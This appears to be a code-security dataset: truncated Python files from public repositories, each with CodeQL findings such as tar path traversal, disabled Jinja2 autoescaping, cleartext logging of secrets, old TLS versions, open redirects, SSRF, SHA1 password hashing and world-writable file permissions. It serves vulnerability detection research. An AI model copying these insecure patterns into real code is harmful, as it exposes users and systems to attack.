[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This file extraction depends on a [potentially untrusted source](1)." ]
[ 31 ]
[ null ]
[ 5 ]
[ 12 ]
2024-11-18T21:22:15.791253+00:00
1,632,151,278,000
796bcd575be9cd59d7b1926a3402fdd349f90f10
2
{ "blob_id": "796bcd575be9cd59d7b1926a3402fdd349f90f10", "branch_name": "refs/heads/main", "committer_date": 1632151278000, "content_id": "9ad940cb1e41b52332faef51af8aeede6da7175e", "detected_licenses": [ "MIT" ], "directory_id": "72c4153332863c18e59e852a89f8cb5460e9c8da", "extension": "py", "file...
2.359375
stackv2
import os import sys os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2" # Append submodule path to python search path sys.path.append(os.path.join(os.getcwd(), 'freeze')) sys.path.append(os.path.join(os.getcwd(), 'tfrmod')) sys.path.append(os.path.join(os.getcwd(), 'automl', 'efficientdet')) # Tools to parse commands, zip and ...
241
38.16
174
15
2,265
python
[{"finding_id": "codeql_py/tarslip_51af8b1bb93e11b4_2d274800", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un...
1
true
[ "CWE-022" ]
[ "py/tarslip" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This file extraction depends on a [potentially untrusted source](1)." ]
[ 41 ]
[ null ]
[ 5 ]
[ 8 ]
2024-11-18T21:22:41.893264+00:00
1,608,331,542,000
c813a72f1a78f9c078403e0576c14bd4008865ef
3
{ "blob_id": "c813a72f1a78f9c078403e0576c14bd4008865ef", "branch_name": "refs/heads/main", "committer_date": 1608331542000, "content_id": "212356970a860051ed6e28ee1be66446e0681841", "detected_licenses": [ "MIT" ], "directory_id": "5167ef6304c0ae735752197328e6f7e5dd9abac2", "extension": "py", "file...
2.59375
stackv2
from jinja2 import Template import logging import ssl import smtplib from email.message import EmailMessage from scan_monitor import config class SMTP: """Class that will send an SMTP email. """ def __init__(self, notification, template_file=config.default_template): self.server = config.smtp_server ...
59
31.93
84
19
382
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_49d7153331f11c95_13378130", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 26 ]
[ null ]
[ 23 ]
[ 54 ]
2024-11-18T21:22:43.893155+00:00
1,554,042,624,000
1dd6c4b98d123949b65566d865dff93b20dfb55d
3
{ "blob_id": "1dd6c4b98d123949b65566d865dff93b20dfb55d", "branch_name": "refs/heads/master", "committer_date": 1554042624000, "content_id": "c73a85c1326607d45e9aa32005caddfd79cd46ae", "detected_licenses": [ "MIT" ], "directory_id": "47b2348d6098aba51466276c1ae11369cea8cde7", "extension": "py", "fi...
2.609375
stackv2
import board import displayio import digitalio import busio import adafruit_touchscreen from adafruit_display_text.label import Label from adafruit_bitmap_font import bitmap_font from adafruit_esp32spi import adafruit_esp32spi import adafruit_esp32spi.adafruit_esp32spi_requests as requests from adafruit_esp32spi import...
331
33.25
108
21
2,900
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_c67163b6885e6ac9_9c0a6fa8", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (secret)](1) as clear text." ]
[ 44 ]
[ null ]
[ 40 ]
[ 48 ]
2024-11-18T21:22:44.708368+00:00
1,601,561,766,000
220cf8459d13c0874f793212beecae1a79d3841e
3
{ "blob_id": "220cf8459d13c0874f793212beecae1a79d3841e", "branch_name": "refs/heads/master", "committer_date": 1601561766000, "content_id": "8138fc3c24be6107c708ae4343ad9e2851813098", "detected_licenses": [ "MIT" ], "directory_id": "db99d9cd74341a96f612d83ae519a77badb12d01", "extension": "py", "fi...
2.796875
stackv2
import ssl import socket import urllib.parse from copy import deepcopy from basic_http.util.networking import is_ip_address from basic_http.data_structures.request import HttpRequest from basic_http.data_structures.response import HttpResponse class Connection(object): def __init__(self): self.__connectio...
230
27.01
109
17
1,305
python
[{"finding_id": "codeql_py/insecure-protocol_48909b37e328d2af_3da0f477", "tool_name": "codeql", "rule_id": "py/insecure-protocol", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Insecure SSL/TLS protocol version TLSv1 allowed by [call to ssl.SSLContext](1).\nInsecure SSL/TLS protocol...
2
true
[ "CWE-327", "CWE-327" ]
[ "py/insecure-protocol", "py/insecure-protocol" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "Insecure SSL/TLS protocol version TLSv1 allowed by [call to ssl.SSLContext](1).\nInsecure SSL/TLS protocol version TLSv1_1 allowed by [call to ssl.SSLContext](1).", "Insecure SSL/TLS protocol version TLSv1 allowed by [call to ssl.SSLContext](1).\nInsecure SSL/TLS protocol version TLSv1_1 allowed by [call to ssl....
[ 65, 126 ]
[ null, null ]
[ 20, 24 ]
[ 31, 35 ]
2024-11-18T21:51:39.974520+00:00
1,589,043,472,000
03f3344c760adc2808f036fd56cb178f071ecd18
3
{ "blob_id": "03f3344c760adc2808f036fd56cb178f071ecd18", "branch_name": "refs/heads/master", "committer_date": 1589043472000, "content_id": "f5fea411c58ce289d176ec04fcca8593de28108a", "detected_licenses": [ "MIT" ], "directory_id": "03bd6964ef36b048ff3a3463484941b75e6dd4c4", "extension": "py", "fi...
3
stackv2
"""Implementations of Checker for zip and tar files.""" from pathlib import Path import tarfile import tempfile import zipfile from zipfile import ZipFile from spot_check_files.checker import Checker, CheckResult, CheckRequest class ZipChecker(Checker): def __str__(self): return 'ZipChecker' """Extra...
59
26.9
76
18
347
python
[{"finding_id": "codeql_py/tarslip_e29732291b240be6_86cb1a22", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un...
1
true
[ "CWE-022" ]
[ "py/tarslip" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This file extraction depends on a [potentially untrusted source](1)." ]
[ 55 ]
[ null ]
[ 17 ]
[ 19 ]
2024-11-18T21:51:46.144577+00:00
1,623,432,712,000
daffaa823b6d0507623df78572305f5c39ba9935
3
{ "blob_id": "daffaa823b6d0507623df78572305f5c39ba9935", "branch_name": "refs/heads/main", "committer_date": 1623432712000, "content_id": "0b6429d3a90704d50560709b6dd1a94cd5ce0e5e", "detected_licenses": [ "Apache-2.0" ], "directory_id": "d69cd0d7789fb1477b4476891957fc08aa7989b0", "extension": "py", ...
2.8125
stackv2
from flask import redirect, render_template, url_for, flash, request, session, current_app from shop import db, app from shop.products.models import Addproduct from shop.products.routes import brands, categories import json #la funzione MagerDicts non fa altro che accettare come parametri due "dizionari" o "liste" ed ...
125
44.11
168
21
1,312
python
[{"finding_id": "codeql_py/url-redirection_e86a372225b0dcee_69383b8e", "tool_name": "codeql", "rule_id": "py/url-redirection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Untrusted URL redirection depends on a [user-provided value](1).", "remediation": "", "location": {"file_...
3
true
[ "CWE-601", "CWE-601", "CWE-601" ]
[ "py/url-redirection", "py/url-redirection", "py/url-redirection" ]
[ "HIGH", "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "Untrusted URL redirection depends on a [user-provided value](1).", "Untrusted URL redirection depends on a [user-provided value](1).", "Untrusted URL redirection depends on a [user-provided value](1).\nUntrusted URL redirection depends on a [user-provided value](1).\nUntrusted URL redirection depends on a [use...
[ 43, 46, 53 ]
[ null, null, null ]
[ 37, 33, 25 ]
[ 53, 49, 41 ]
2024-11-18T21:52:00.688694+00:00
1,629,459,648,000
61a57abc3452da8347e52c90de9428aefc203d2b
3
{ "blob_id": "61a57abc3452da8347e52c90de9428aefc203d2b", "branch_name": "refs/heads/main", "committer_date": 1629459648000, "content_id": "0514d54fe9df3f2b74a1e823d39fdbba9ed58f97", "detected_licenses": [ "MIT" ], "directory_id": "16109f1a6eb38ad6a043502546ff4b16daac8fe8", "extension": "py", "file...
2.828125
stackv2
import uvicorn import requests import uuid from fastapi import FastAPI, Path from typing import Optional from pydantic import BaseModel from config.config import config class User(BaseModel): name: str username: str = uuid.uuid4() email: Optional[str] = None phone: Optional[str] = None website: Op...
220
26.13
104
16
1,286
python
[{"finding_id": "codeql_py/partial-ssrf_66d36699d4ee3958_ef81f916", "tool_name": "codeql", "rule_id": "py/partial-ssrf", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "Part of the URL of this request depends on a [user-provided value](1).\nPart of the URL of this request depen...
6
true
[ "CWE-918", "CWE-918", "CWE-918", "CWE-918", "CWE-918", "CWE-918" ]
[ "py/partial-ssrf", "py/partial-ssrf", "py/partial-ssrf", "py/partial-ssrf", "py/partial-ssrf", "py/partial-ssrf" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "Part of the URL of this request depends on a [user-provided value](1).\nPart of the URL of this request depends on a [user-provided value](2).", "Part of the URL of this request depends on a [user-provided value](1).", "Part of the URL of this request depends on a [user-provided value](1).", "Part of the URL...
[ 66, 89, 151, 157, 188, 190 ]
[ 67, null, null, 158, null, 191 ]
[ 17, 16, 23, 28, 23, 28 ]
[ 70, 65, 72, 67, 72, 53 ]
2024-11-18T22:16:42.312883+00:00
1,575,418,219,000
f1025503c16d628c1e34d0d162752682fbd69357
4
{ "blob_id": "f1025503c16d628c1e34d0d162752682fbd69357", "branch_name": "refs/heads/master", "committer_date": 1575418219000, "content_id": "0349e2ca688dac82e34a5b95349b014edb1c853c", "detected_licenses": [ "MIT" ], "directory_id": "4e9f3c88233411f06a3551824f9df7bc89c9378e", "extension": "py", "fi...
3.890625
stackv2
# Import required packages import json # Open the file and load json into 'data' with open("workers.json",'r') as f: data = json.load(f) # We see the json is imported as dictionnary print(type(data)) # Get the element 'Employee' employees = data["Employee"] print(type(employees)) for e in employees: # loop t...
19
23.68
48
9
117
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_f3fb2c33617cd173_83d91e1a", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text." ]
[ 15 ]
[ null ]
[ 11 ]
[ 12 ]
2024-11-18T22:27:42.517280+00:00
1,586,274,576,000
549acdb165fc202f88280a33daf429a9b9193a3c
3
{ "blob_id": "549acdb165fc202f88280a33daf429a9b9193a3c", "branch_name": "refs/heads/master", "committer_date": 1586274576000, "content_id": "676302bcc631265f7cb9adbb552b67d233d21c15", "detected_licenses": [ "MIT" ], "directory_id": "893fcaa678e7bf1c2d3f6691ad9b4c704bef007b", "extension": "py", "fi...
3.25
stackv2
code= """********************************* Made By Ceasar Agbekuadzi *********************************""" print(code) while True: print("\n Welcome to the setup of the Game") user_Name=input("\n PLease enter your name: ") password=input("\n Please enter your password: ") ...
27
28.44
68
11
160
python
[{"finding_id": "codeql_py/clear-text-storage-sensitive-data_30203d3db0cf6c4a_adc36b5d", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."...
1
true
[ "CWE-312" ]
[ "py/clear-text-storage-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression stores [sensitive data (password)](1) as clear text." ]
[ 19 ]
[ null ]
[ 24 ]
[ 32 ]
2024-11-18T22:28:16.166379+00:00
1,500,369,462,000
9818efa8fa7da3752ad4ce51f291e2a95bc9d209
2
{ "blob_id": "9818efa8fa7da3752ad4ce51f291e2a95bc9d209", "branch_name": "refs/heads/master", "committer_date": 1500369462000, "content_id": "ab3d481e3d94305449e22c65bb6626b701316eed", "detected_licenses": [ "MIT" ], "directory_id": "ce3652741e1be2443c13329ef53b42cdc43c8efb", "extension": "py", "fi...
2.359375
stackv2
from sqlalchemy import Column, ForeignKey, UniqueConstraint, String, Text from sqlalchemy.orm import relationship from sqlalchemy.orm import column_property, relationship, validates from frt_server.common import CommonColumns import frt_server.config import hashlib import string import random import os from itsdange...
105
35.13
106
20
806
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_bfbe7005a0dfd3f1_7d25b873", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is inse...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expen...
[ 91 ]
[ null ]
[ 33 ]
[ 76 ]
2024-11-18T22:44:10.245600+00:00
1,313,886,783,000
b0ee59d0623e887ee00c87ccc40c61b04202fd64
3
{ "blob_id": "b0ee59d0623e887ee00c87ccc40c61b04202fd64", "branch_name": "refs/heads/master", "committer_date": 1313886783000, "content_id": "66849628d4c03b6df1ba3788ff315ba0a3754eb9", "detected_licenses": [ "Apache-2.0" ], "directory_id": "74b2206cd20b6150549f8c9a31abf4cb0d4f6363", "extension": "py"...
2.765625
stackv2
"""GENERIC HANDLER Template for handler tools. Unless stated otherwise, code here is adapted from code.google.com/p/ph-sms/source/browse/trunk/python/mh_handlers/__init__.py """ # IMPORTS START HERE --------------------------------------------------------- # standard library imports from __future__ import with_sta...
90
30.69
128
14
548
python
[{"finding_id": "codeql_py/overly-permissive-file_1391f12901658dff_f4c34381", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world writable.", "remediation": "", "location": ...
1
true
[ "CWE-732" ]
[ "py/overly-permissive-file" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Overly permissive mask in chmod sets file to world writable." ]
[ 82 ]
[ null ]
[ 13 ]
[ 31 ]
2024-11-18T22:44:46.956706+00:00
1,610,642,521,000
6e0bc20254e0c3085919e82ec1448d9db2ef6d10
2
{ "blob_id": "6e0bc20254e0c3085919e82ec1448d9db2ef6d10", "branch_name": "refs/heads/master", "committer_date": 1610642521000, "content_id": "8f5d2d704aaa1d32109129715de54e515a8c8f20", "detected_licenses": [ "Apache-2.0" ], "directory_id": "c0088e4900dfd1451085bee045f0be5a61835a93", "extension": "py"...
2.390625
stackv2
import requests import json from datasources import ds_csv_1 result = requests.post('http://localhost:8080/simjoin/api/addsource', data=json.dumps(ds_csv_1), headers={'Content-Type':'application/json', 'accept': 'application/js...
24
34
72
10
162
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0fd56aaca3ad96e3_8b309af9", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 13 ]
[ null ]
[ 7 ]
[ 46 ]